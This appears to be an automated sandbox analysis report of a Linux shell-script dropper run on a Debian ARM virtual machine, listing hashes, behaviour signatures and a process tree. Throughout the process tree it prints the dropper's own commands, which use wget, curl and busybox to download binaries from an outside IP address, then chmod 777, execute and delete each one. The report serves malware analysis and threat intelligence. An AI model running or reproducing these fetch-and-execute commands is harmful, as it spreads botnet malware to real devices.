Analysis
-
max time kernel
62s -
max time network
66s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-11-2024 05:18
Static task
static1
Behavioral task
behavioral1
Sample
baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d.sh
-
Size
10KB
-
MD5
add9df3fe0956071f11080084a31bdeb
-
SHA1
f7ae02765b04a8c8e2a9f9c67fe20acd4516fd05
-
SHA256
baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d
-
SHA512
2e6bd72689deb04f699f94d15949886de251783f5e5c037cd76647fc10b6777f1c7fa1659fbec5e824ef0427e152a3879744edfceed370b4a3213d41749cc84c
-
SSDEEP
96:9aG1ai9mSxkvymsIWTbbSb2bNbUb0bRG+aG1ai0SM9SvVkT7kmiec+vobbSb2bNj:7xkvymsIWTPK7GX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 797 chmod 814 chmod 716 chmod 767 chmod 831 chmod 890 chmod 934 chmod 698 chmod 704 chmod 780 chmod 858 chmod 687 chmod 787 chmod 896 chmod 846 chmod 864 chmod 940 chmod 748 chmod 852 chmod 882 chmod 731 chmod 870 chmod 927 chmod 920 chmod 876 chmod 902 chmod 908 chmod 914 chmod -
Executes dropped EXE 28 IoCs
Processes:
tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEeIUGjQGP9j20LhOTC222fZIrfyOuPYtk9iReBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLsOYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJbzsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThVZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQKDBDhSt7ce4AH4R76TedzosCU6IiiU2hJdPdEZ8264siDtS3uUhD7KAvI2T1jba3WR13OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoENFPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYkukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGswDt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0VT9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEeIUGjQGP9j20LhOTC222fZIrfyOuPYtk9iReBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLsOYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJbzsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThVZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQKDBDhSt7ce4AH4R76TedzosCU6IiiU2hJdPdEZ8264siDtS3uUhD7KAvI2T1jba3WR13OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoENFPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYkukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGswDt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0VT9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6ioc pid process /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe 688 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR 699 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj 705 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs 717 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb 733 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV 750 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ 769 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd 782 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd /tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 788 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 /tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN 802 OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN /tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk 817 FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk /tmp/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw 832 ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw /tmp/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V 847 Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V /tmp/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6 853 T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6 /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe 859 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR 865 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj 871 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs 877 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb 883 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV 891 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ 897 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd 903 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd /tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 909 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 /tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN 915 OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN /tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk 921 FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk /tmp/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw 929 ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw /tmp/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V 935 Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V /tmp/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6 941 T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6 -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetbusyboxcurlbusyboxZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQrmwgetcurlZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQpid process 770 rm 893 wget 895 busybox 756 curl 762 busybox 769 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ 898 rm 753 wget 894 curl 897 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 curl File opened for modification /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj curl File opened for modification /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd curl File opened for modification /tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk curl File opened for modification /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV curl File opened for modification /tmp/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6 curl File opened for modification /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV curl File opened for modification /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR curl File opened for modification /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb curl File opened for modification /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe curl File opened for modification /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ curl File opened for modification /tmp/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw curl File opened for modification /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs curl File opened for modification /tmp/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V curl File opened for modification /tmp/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6 curl File opened for modification /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj curl File opened for modification /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd curl File opened for modification /tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN curl File opened for modification /tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk curl File opened for modification /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb curl File opened for modification /tmp/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V curl File opened for modification /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe curl File opened for modification /tmp/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw curl File opened for modification /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR curl File opened for modification /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs curl File opened for modification /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ curl File opened for modification /tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 curl File opened for modification /tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN curl
Processes
-
/tmp/baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d.sh/tmp/baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d.sh1⤵PID:658
-
/bin/rm/bin/rm bins.sh2⤵PID:666
-
/usr/bin/wgetwget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵PID:668
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵PID:684
-
/bin/chmodchmod 777 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- File and Directory Permissions Modification
PID:687 -
/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe./tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Executes dropped EXE
PID:688 -
/bin/rmrm tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵PID:689
-
/usr/bin/wgetwget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵PID:691
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵PID:697
-
/bin/chmodchmod 777 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- File and Directory Permissions Modification
PID:698 -
/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR./IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Executes dropped EXE
PID:699 -
/bin/rmrm IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵PID:700
-
/usr/bin/wgetwget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵PID:701
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:702 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵PID:703
-
/bin/chmodchmod 777 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- File and Directory Permissions Modification
PID:704 -
/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj./eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Executes dropped EXE
PID:705 -
/bin/rmrm eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵PID:706
-
/usr/bin/wgetwget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵PID:707
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵PID:713
-
/bin/chmodchmod 777 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- File and Directory Permissions Modification
PID:716 -
/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs./7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Executes dropped EXE
PID:717 -
/bin/rmrm 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵PID:719
-
/usr/bin/wgetwget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵PID:720
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵PID:728
-
/bin/chmodchmod 777 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- File and Directory Permissions Modification
PID:731 -
/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb./OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Executes dropped EXE
PID:733 -
/bin/rmrm OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵PID:734
-
/usr/bin/wgetwget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵PID:736
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵PID:744
-
/bin/chmodchmod 777 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- File and Directory Permissions Modification
PID:748 -
/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV./zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Executes dropped EXE
PID:750 -
/bin/rmrm zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵PID:751
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
PID:753 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:756 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
PID:762 -
/bin/chmodchmod 777 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- File and Directory Permissions Modification
PID:767 -
/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ./ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:769 -
/bin/rmrm ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
PID:770 -
/usr/bin/wgetwget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵PID:771
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵PID:779
-
/bin/chmodchmod 777 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- File and Directory Permissions Modification
PID:780 -
/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd./KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Executes dropped EXE
PID:782 -
/bin/rmrm KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵PID:783
-
/usr/bin/wgetwget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:784
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:786
-
/bin/chmodchmod 777 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- File and Directory Permissions Modification
PID:787 -
/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13./PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- Executes dropped EXE
PID:788 -
/bin/rmrm PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:789
-
/usr/bin/wgetwget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:790
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:794
-
/bin/chmodchmod 777 OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵
- File and Directory Permissions Modification
PID:797 -
/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN./OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵
- Executes dropped EXE
PID:802 -
/bin/rmrm OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:803
-
/usr/bin/wgetwget http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵PID:805
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵PID:812
-
/bin/chmodchmod 777 FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵
- File and Directory Permissions Modification
PID:814 -
/tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk./FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵
- Executes dropped EXE
PID:817 -
/bin/rmrm FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵PID:818
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵PID:821
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵PID:829
-
/bin/chmodchmod 777 ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵
- File and Directory Permissions Modification
PID:831 -
/tmp/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw./ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵
- Executes dropped EXE
PID:832 -
/bin/rmrm ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵PID:833
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵PID:835
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵PID:843
-
/bin/chmodchmod 777 Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵
- File and Directory Permissions Modification
PID:846 -
/tmp/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V./Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵
- Executes dropped EXE
PID:847 -
/bin/rmrm Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵PID:848
-
/usr/bin/wgetwget http://87.120.84.230/bins/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵PID:849
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵PID:851
-
/bin/chmodchmod 777 T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵
- File and Directory Permissions Modification
PID:852 -
/tmp/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6./T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵
- Executes dropped EXE
PID:853 -
/bin/rmrm T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵PID:854
-
/usr/bin/wgetwget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵PID:855
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵PID:857
-
/bin/chmodchmod 777 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- File and Directory Permissions Modification
PID:858 -
/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe./tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Executes dropped EXE
PID:859 -
/bin/rmrm tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵PID:860
-
/usr/bin/wgetwget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵PID:861
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862 -
